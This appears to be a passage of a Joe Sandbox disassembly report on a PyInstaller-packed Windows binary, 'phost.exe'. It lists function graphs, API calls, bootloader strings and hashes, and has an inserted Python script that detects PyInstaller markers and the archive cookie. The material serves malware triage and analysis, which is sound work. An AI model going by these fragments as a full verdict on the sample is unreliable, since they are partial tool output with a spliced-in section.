20062 7ff62cc8ec08 _get_daylight 11 API calls 20062->20067 20063 7ff62cc894d0 20064 7ff62cc89518 11 API calls 20063->20064 20066 7ff62cc894d8 20064->20066 20065 7ff62cc904e4 37 API calls 20065->20067 20068 7ff62cc8a9b8 __free_lconv_num 11 API calls 20066->20068 20067->20060 20067->20062 20067->20063 20067->20065 20069 7ff62cc89504 20067->20069 20070 7ff62cc89467 20067->20070 20072 7ff62cc8a9b8 __free_lconv_num 11 API calls 20067->20072 20068->20070 20071 7ff62cc8a970 _isindst 17 API calls 20069->20071 20070->20058 20073 7ff62cc89516 20071->20073 20072->20067 20076 7ff62cc98ba1 __crtLCMapStringW 20074->20076 20075 7ff62cc9715e 20075->19709 20075->19710 20076->20075 20077 7ff62cc8efd8 6 API calls 20076->20077 20077->20075 19212 7ff62cc7cbc0 19213 7ff62cc7cbd0 19212->19213 19229 7ff62cc89c18 19213->19229 19215 7ff62cc7cbdc 19235 7ff62cc7ceb8 19215->19235 19217 7ff62cc7d19c 7 API calls 19219 7ff62cc7cc75 19217->19219 19218 7ff62cc7cbf4 _RTC_Initialize 19227 7ff62cc7cc49 19218->19227 19240 7ff62cc7d068 19218->19240 19221 7ff62cc7cc09 19243 7ff62cc89084 19221->19243 19227->19217 19228 7ff62cc7cc65 19227->19228 19230 7ff62cc89c29 19229->19230 19231 7ff62cc89c31 19230->19231 19232 7ff62cc84f78 _get_daylight 11 API calls 19230->19232 19231->19215 19233 7ff62cc89c40 19232->19233 19234 7ff62cc8a950 _invalid_parameter_noinfo 37 API calls 19233->19234 19234->19231 19236 7ff62cc7cec9 19235->19236 19239 7ff62cc7cece __scrt_release_startup_lock 19235->19239 19237 7ff62cc7d19c 7 API calls 19236->19237 19236->19239 19238 7ff62cc7cf42 19237->19238 19239->19218 19268 7ff62cc7d02c 19240->19268 19242 7ff62cc7d071 19242->19221 19244 7ff62cc7cc15 19243->19244 19245 7ff62cc890a4 19243->19245 19244->19227 19267 7ff62cc7d13c InitializeSListHead 19244->19267 19246 7ff62cc890c2 GetModuleFileNameW 19245->19246 19247 7ff62cc890ac 19245->19247 19251 7ff62cc890ed 19246->19251 19248 7ff62cc84f78 _get_daylight 11 API calls 19247->19248 19249 7ff62cc890b1 19248->19249 19250 7ff62cc8a950 
_invalid_parameter_noinfo 37 API calls 19249->19250 19250->19244 19283 7ff62cc89024 19251->19283 19254 7ff62cc89135 19255 7ff62cc84f78 _get_daylight 11 API calls 19254->19255 19256 7ff62cc8913a 19255->19256 19259 7ff62cc8a9b8 __free_lconv_num 11 API calls 19256->19259 19257 7ff62cc8916f 19260 7ff62cc8a9b8 __free_lconv_num 11 API calls 19257->19260 19258 7ff62cc8914d 19258->19257 19261 7ff62cc891b4 19258->19261 19262 7ff62cc8919b 19258->19262 19259->19244 19260->19244 19264 7ff62cc8a9b8 __free_lconv_num 11 API calls 19261->19264 19263 7ff62cc8a9b8 __free_lconv_num 11 API calls 19262->19263 19265 7ff62cc891a4 19263->19265 19264->19257 19266 7ff62cc8a9b8 __free_lconv_num 11 API calls 19265->19266 19266->19244 19269 7ff62cc7d046 19268->19269 19271 7ff62cc7d03f 19268->19271 19272 7ff62cc8a25c 19269->19272 19271->19242 19275 7ff62cc89e98 19272->19275 19282 7ff62cc90348 EnterCriticalSection 19275->19282 19284 7ff62cc8903c 19283->19284 19285 7ff62cc89074 19283->19285 19284->19285 19286 7ff62cc8ec08 _get_daylight 11 API calls 19284->19286 19285->19254 19285->19258 19287 7ff62cc8906a 19286->19287 19288 7ff62cc8a9b8 __free_lconv_num 11 API calls 19287->19288 19288->19285 20792 7ff62cc9ae6e 20793 7ff62cc9ae87 20792->20793 20794 7ff62cc9ae7d 20792->20794 20796 7ff62cc903a8 LeaveCriticalSection 20794->20796 19302 7ff62cc9add9 19305 7ff62cc854e8 LeaveCriticalSection 19302->19305

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
• String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
• API String ID: 3832162212-3165540532
• Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
• Instruction ID: b159eae329c0bc85a85ee568c798fbc114d92dfde71437af0e6046ae3e281688
• Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
• Instruction Fuzzy Hash: 1CD16032B08A8296EF208F38EC646B93774FF84B68F404235DA5D96AA4DF3CD559D701

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: ErrorFileLastModuleName
• String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
• API String ID: 2776309574-3273434969
• Opcode ID: 5175dd211561270c01c090de14ed05897007262ae42d5fb09ddae339d6dfd05a
• Instruction ID: d91159f3654b64ad46d2a51dc8f32fd18666e8e3e401ee22508fd9f32b87e453
• Opcode Fuzzy Hash: 5175dd211561270c01c090de14ed05897007262ae42d5fb09ddae339d6dfd05a
• Instruction Fuzzy Hash: 6E32AE21F4C68291FF25DB29DD552B92279EF447A4F884032DA4DCB2C6EF2CE559E302
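The String ID above is the string set of a PyInstaller onefile bootloader: the `pyi-*` runtime options, the `_PYI_*` environment variables used to hand state to the onefile child process, the `MEI` archive cookie tag, and the PKG-archive error messages. That is what the report's "Found pyInstaller" verdict rests on, and it is the first thing to check before trying to unpack the embedded Python payload. The following is an added triage example, not code from the Joe Sandbox report or from PyInstaller: it scans a file for the marker strings listed on this page and for PyInstaller's published CArchive cookie (8-byte magic `MEI\x0c\x0b\x0a\x0b\x0e` followed by an 88-byte big-endian header). The cookie layout is PyInstaller's documented format, the hit threshold is my own choice, and the sample buffer is constructed, not taken from phost.exe.

```python
"""Triage: does this binary carry a PyInstaller onefile bootloader and PKG archive?

Added example; not part of the Joe Sandbox report or of PyInstaller itself.
"""
from __future__ import annotations

from dataclasses import dataclass, field
from pathlib import Path

# Runtime options and environment variables the bootloader parses.
# Every string here appears in the report's String ID for this function.
BOOTLOADER_MARKERS: tuple[bytes, ...] = (
    b"PYINSTALLER_RESET_ENVIRONMENT",
    b"PYINSTALLER_STRICT_UNPACK_MODE",
    b"PYINSTALLER_SUPPRESS_SPLASH_SCREEN",
    b"_PYI_APPLICATION_HOME_DIR",
    b"_PYI_ARCHIVE_FILE",
    b"_PYI_PARENT_PROCESS_LEVEL",
    b"_PYI_SPLASH_IPC",
    b"pyi-contents-directory",
    b"pyi-disable-windowed-traceback",
    b"pyi-python-flag",
)
# Bootloader error messages, also from the report's String ID.
ERROR_MARKERS: tuple[bytes, ...] = (
    b"Could not load PyInstaller's embedded PKG archive from the executable",
    b"Could not side-load PyInstaller's PKG archive from external file",
    b"Failed to initialize security descriptor for temporary directory!",
    b"_PYI_APPLICATION_HOME_DIR not set for onefile child process!",
)
# PyInstaller CArchive cookie: documented format constants, not taken from the report.
# Layout (big-endian): magic(8) pkg_len(4) toc_offset(4) toc_len(4) pyvers(4) pylib(64) = 88 bytes.
MEI_COOKIE_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
COOKIE_LEN = 88


@dataclass
class PyiTriage:
    marker_hits: list[str] = field(default_factory=list)
    error_hits: list[str] = field(default_factory=list)
    cookie_offset: int | None = None   # file offset of the cookie, if found
    pkg_length: int | None = None      # length of the PKG archive as the cookie declares it

    @property
    def is_pyinstaller(self) -> bool:
        # A cookie is decisive on its own; without it require several bootloader strings
        # (threshold of 3 is an assumption chosen to avoid firing on a single stray string).
        return self.cookie_offset is not None or len(self.marker_hits) >= 3


def find_cookie(data: bytes) -> tuple[int, int] | None:
    """Locate the last CArchive cookie and return (offset, declared PKG length).

    rfind is used because an Authenticode signature may follow the cookie in a signed file.
    """
    idx = data.rfind(MEI_COOKIE_MAGIC)
    if idx < 0 or idx + COOKIE_LEN > len(data):
        return None
    pkg_len = int.from_bytes(data[idx + 8 : idx + 12], "big")
    return idx, pkg_len


def triage(data: bytes) -> PyiTriage:
    """Scan a byte buffer for bootloader strings and the archive cookie."""
    result = PyiTriage()
    result.marker_hits = [m.decode() for m in BOOTLOADER_MARKERS if m in data]
    result.error_hits = [m.decode() for m in ERROR_MARKERS if m in data]
    cookie = find_cookie(data)
    if cookie is not None:
        result.cookie_offset, result.pkg_length = cookie
    return result


def triage_file(path: str | Path) -> PyiTriage:
    return triage(Path(path).read_bytes())


def build_sample() -> bytes:
    """Constructed stand-in for a onefile binary: stub header, a few marker strings,
    a 200-byte fake PKG body, and a well-formed cookie. Not real malware."""
    header = (b"MZ" + b"\x00" * 64
              + b"_PYI_ARCHIVE_FILE\x00pyi-contents-directory\x00"
              + b"Could not load PyInstaller's embedded PKG archive from the executable (%s)\x00")
    fake_pkg = b"\x00" * 200
    # pkg_len counts the cookie itself, matching how the bootloader computes the archive start.
    cookie = (MEI_COOKIE_MAGIC
              + (len(fake_pkg) + COOKIE_LEN).to_bytes(4, "big")
              + (0).to_bytes(4, "big") + (0).to_bytes(4, "big")
              + (312).to_bytes(4, "big", signed=True)
              + b"python312.dll".ljust(64, b"\x00"))
    return header + fake_pkg + cookie


if __name__ == "__main__":
    verdict = triage(build_sample())
    print(verdict.is_pyinstaller, verdict.marker_hits, verdict.cookie_offset, verdict.pkg_length)
```

Run `triage_file("phost.exe")` against a sample of interest; a positive cookie hit gives the offset from which a PKG/TOC parser (pyinstxtractor or similar) can pull the embedded .pyc payload for the next stage of analysis. Treat the string-only verdict as weaker evidence, since an attacker can strip or rewrite bootloader strings without breaking the archive.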

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                                                                                              control_flow_graph 536 7ff62cc969d4-7ff62cc96a47 call 7ff62cc96708 539 7ff62cc96a61-7ff62cc96a6b call 7ff62cc88590 536->539 540 7ff62cc96a49-7ff62cc96a52 call 7ff62cc84f58 536->540 545 7ff62cc96a86-7ff62cc96aef CreateFileW 539->545 546 7ff62cc96a6d-7ff62cc96a84 call 7ff62cc84f58 call 7ff62cc84f78 539->546 547 7ff62cc96a55-7ff62cc96a5c call 7ff62cc84f78 540->547 549 7ff62cc96af1-7ff62cc96af7 545->549 550 7ff62cc96b6c-7ff62cc96b77 GetFileType 545->550 546->547 558 7ff62cc96da2-7ff62cc96dc2 547->558 556 7ff62cc96b39-7ff62cc96b67 GetLastError call 7ff62cc84eec 549->556 557 7ff62cc96af9-7ff62cc96afd 549->557 553 7ff62cc96b79-7ff62cc96bb4 GetLastError call 7ff62cc84eec CloseHandle 550->553 554 7ff62cc96bca-7ff62cc96bd1 550->554 553->547 570 7ff62cc96bba-7ff62cc96bc5 call 7ff62cc84f78 553->570 561 7ff62cc96bd3-7ff62cc96bd7 554->561 562 7ff62cc96bd9-7ff62cc96bdc 554->562 556->547 557->556 563 7ff62cc96aff-7ff62cc96b37 CreateFileW 557->563 567 7ff62cc96be2-7ff62cc96c37 call 7ff62cc884a8 561->567 562->567 568 7ff62cc96bde 562->568 563->550 563->556 575 7ff62cc96c56-7ff62cc96c87 call 7ff62cc96488 567->575 576 7ff62cc96c39-7ff62cc96c45 call 7ff62cc96910 567->576 568->567 570->547 582 7ff62cc96c89-7ff62cc96c8b 575->582 583 7ff62cc96c8d-7ff62cc96ccf 575->583 576->575 581 7ff62cc96c47 576->581 584 7ff62cc96c49-7ff62cc96c51 call 7ff62cc8ab30 581->584 582->584 585 7ff62cc96cf1-7ff62cc96cfc 583->585 586 7ff62cc96cd1-7ff62cc96cd5 583->586 584->558 589 7ff62cc96da0 585->589 590 7ff62cc96d02-7ff62cc96d06 585->590 586->585 588 7ff62cc96cd7-7ff62cc96cec 586->588 588->585 589->558 590->589 592 7ff62cc96d0c-7ff62cc96d51 CloseHandle CreateFileW 590->592 593 7ff62cc96d53-7ff62cc96d81 GetLastError call 7ff62cc84eec call 7ff62cc886d0 592->593 594 7ff62cc96d86-7ff62cc96d9b 
592->594 593->594 594->589
APIs
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
• String ID:
• API String ID: 1617910340-0
• Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
• Instruction ID: 7df44e4102c86179fbd9d14821d3b9baefb01ab3e15938cec973a855de33fc49
• Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
• Instruction Fuzzy Hash: 46C1AF36B28A8186EF50DFA9C8906BD3771EB49BA8B019225DE2E977D4DF38D451C301

Control-flow Graph

APIs
• FindFirstFileW.KERNELBASE(?,00007FF62CC78B09,00007FF62CC73FA5), ref: 00007FF62CC7841B
• RemoveDirectoryW.KERNEL32(?,00007FF62CC78B09,00007FF62CC73FA5), ref: 00007FF62CC7849E
• DeleteFileW.KERNELBASE(?,00007FF62CC78B09,00007FF62CC73FA5), ref: 00007FF62CC784BD
• FindNextFileW.KERNELBASE(?,00007FF62CC78B09,00007FF62CC73FA5), ref: 00007FF62CC784CB
• FindClose.KERNEL32(?,00007FF62CC78B09,00007FF62CC73FA5), ref: 00007FF62CC784DC
• RemoveDirectoryW.KERNELBASE(?,00007FF62CC78B09,00007FF62CC73FA5), ref: 00007FF62CC784E5
Strings
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
• String ID: %s\*
• API String ID: 1057558799-766152087
• Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
• Instruction ID: 73ded091df39234f463fa43328688e7d89e14cb84603c2f2eb130bd565fcc088
• Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
• Instruction Fuzzy Hash: 0141A232B0C94291EE309B28EC645B96374FF94774F800232D69DDAAD4DF7CD54A9702
APIs
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
• Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
• Instruction ID: f948e57ca8638abdaf421297596fcdd9006840ea5b7e6967280019a7dc4aee91
• Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
• Instruction Fuzzy Hash: 88F0493271864286FF708B64B8597766370EB88778F084235D96D45AD4DF3CD05DD601

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                                                                                              control_flow_graph 329 7ff62cc71950-7ff62cc7198b call 7ff62cc745b0 332 7ff62cc71991-7ff62cc719d1 call 7ff62cc77f80 329->332 333 7ff62cc71c4e-7ff62cc71c72 call 7ff62cc7c5c0 329->333 338 7ff62cc71c3b-7ff62cc71c3e call 7ff62cc800bc 332->338 339 7ff62cc719d7-7ff62cc719e7 call 7ff62cc80744 332->339 343 7ff62cc71c43-7ff62cc71c4b 338->343 344 7ff62cc71a08-7ff62cc71a24 call 7ff62cc8040c 339->344 345 7ff62cc719e9-7ff62cc71a03 call 7ff62cc84f78 call 7ff62cc72910 339->345 343->333 350 7ff62cc71a26-7ff62cc71a40 call 7ff62cc84f78 call 7ff62cc72910 344->350 351 7ff62cc71a45-7ff62cc71a5a call 7ff62cc84f98 344->351 345->338 350->338 359 7ff62cc71a5c-7ff62cc71a76 call 7ff62cc84f78 call 7ff62cc72910 351->359 360 7ff62cc71a7b-7ff62cc71afc call 7ff62cc71c80 * 2 call 7ff62cc80744 351->360 359->338 371 7ff62cc71b01-7ff62cc71b14 call 7ff62cc84fb4 360->371 374 7ff62cc71b16-7ff62cc71b30 call 7ff62cc84f78 call 7ff62cc72910 371->374 375 7ff62cc71b35-7ff62cc71b4e call 7ff62cc8040c 371->375 374->338 381 7ff62cc71b50-7ff62cc71b6a call 7ff62cc84f78 call 7ff62cc72910 375->381 382 7ff62cc71b6f-7ff62cc71b8b call 7ff62cc80180 375->382 381->338 389 7ff62cc71b8d-7ff62cc71b99 call 7ff62cc72710 382->389 390 7ff62cc71b9e-7ff62cc71bac 382->390 389->338 390->338 393 7ff62cc71bb2-7ff62cc71bb9 390->393 395 7ff62cc71bc1-7ff62cc71bc7 393->395 396 7ff62cc71bc9-7ff62cc71bd6 395->396 397 7ff62cc71be0-7ff62cc71bef 395->397 398 7ff62cc71bf1-7ff62cc71bfa 396->398 397->397 397->398 399 7ff62cc71bfc-7ff62cc71bff 398->399 400 7ff62cc71c0f 398->400 399->400 401 7ff62cc71c01-7ff62cc71c04 399->401 402 7ff62cc71c11-7ff62cc71c24 400->402 401->400 403 7ff62cc71c06-7ff62cc71c09 401->403 404 7ff62cc71c2d-7ff62cc71c39 402->404 405 7ff62cc71c26 402->405 403->400 406 7ff62cc71c0b-7ff62cc71c0d 403->406 404->338 
404->395 405->404 406->402
APIs
  • Part of subcall function 00007FF62CC77F80: _fread_nolock.LIBCMT ref: 00007FF62CC7802A
• _fread_nolock.LIBCMT ref: 00007FF62CC71A1B
  • Part of subcall function 00007FF62CC72910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF62CC71B6A), ref: 00007FF62CC7295E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                              • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                              • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                              • Opcode ID: a160029e6a37842be442ab761c617b97701ff7f030f4f7bf0d288629a410a574
                                                                                                                                                                                                                              • Instruction ID: c2a2261a0094ef8775b33c91a0820f30aa242f53cdaacb0095c9c6d03841031e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a160029e6a37842be442ab761c617b97701ff7f030f4f7bf0d288629a410a574
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3B81D071F0868295EF60CB28DC506BA63B4EF487A4F448135E98DCB789DE3CE1899742

Control-flow Graph
control_flow_graph: function 7ff62cc71600 (basic blocks 7ff62cc71600..7ff62cc7183b; calls 7ff62cc745b0, 7ff62cc71050, 7ff62cc84f78, 7ff62cc72910, 7ff62cc72710, 7ff62cc80744, 7ff62cc800bc, 7ff62cc84fb4, 7ff62cc71210, 7ff62cc84fa0, 7ff62cc8040c, 7ff62cc80b4c); rendered edge list omitted
Strings
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
• API String ID: 2050909247-1550345328
• Opcode ID: b7cfde611c470d5de2a22cfb734085cfddee959ab285f2d596dd9298a7ff1e46
• Instruction ID: 6c96872fd3c04f717ddf50332f0eeaef5c0b80b224cbd514c2afb797666a725a
• Opcode Fuzzy Hash: b7cfde611c470d5de2a22cfb734085cfddee959ab285f2d596dd9298a7ff1e46
• Instruction Fuzzy Hash: E351B031B0864392EE119B199C105BA63B4FF44BB8F444635EE0C8B79ADF3CE549E342

Control-flow Graph
APIs
• GetTempPathW.KERNEL32(?,?,00000000,00007FF62CC73CBB), ref: 00007FF62CC788F4
• GetCurrentProcessId.KERNEL32(?,00000000,00007FF62CC73CBB), ref: 00007FF62CC788FA
• CreateDirectoryW.KERNELBASE(?,00000000,00007FF62CC73CBB), ref: 00007FF62CC7893C
  • Part of subcall function 00007FF62CC78A20: GetEnvironmentVariableW.KERNEL32(00007FF62CC7388E), ref: 00007FF62CC78A57
  • Part of subcall function 00007FF62CC78A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF62CC78A79
  • Part of subcall function 00007FF62CC882A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62CC882C1
  • Part of subcall function 00007FF62CC72810: MessageBoxW.USER32 ref: 00007FF62CC728EA
Strings
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
• String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
• API String ID: 3563477958-1339014028
• Opcode ID: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
• Instruction ID: 7a4a8b3e2f65bae2bc4e16544f6c3f064f679bdbd2ccd38a7ae920dcf4e9da43
• Opcode Fuzzy Hash: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
• Instruction Fuzzy Hash: A9418F21B1C64240FE25EB2DAD552BA12B4EF897E4F404131EE0DDB696EE3CE5099342

Control-flow Graph
control_flow_graph: function 7ff62cc71210 (basic blocks 7ff62cc71210..7ff62cc7146d; calls 7ff62cc7bdf0, 7ff62cc84fb4, 7ff62cc72710, 7ff62cc84f78, 7ff62cc72910, 7ff62cc7bad0, 7ff62cc84fa0, 7ff62cc8040c, 7ff62cc80180, 7ff62cc7a230, 7ff62cc80b4c, 7ff62cc99ea0); rendered edge list omitted
Strings
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: CurrentProcess
• String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
• API String ID: 2050909247-2813020118
• Opcode ID: 5203fde90a14cfca52878d148793ed0f56fa2f4a03ba52266beea290f2c18543
• Instruction ID: 6de156a15c2040317328a8afe42b7c9599c13c37742a4f841dc13d74ec64d578
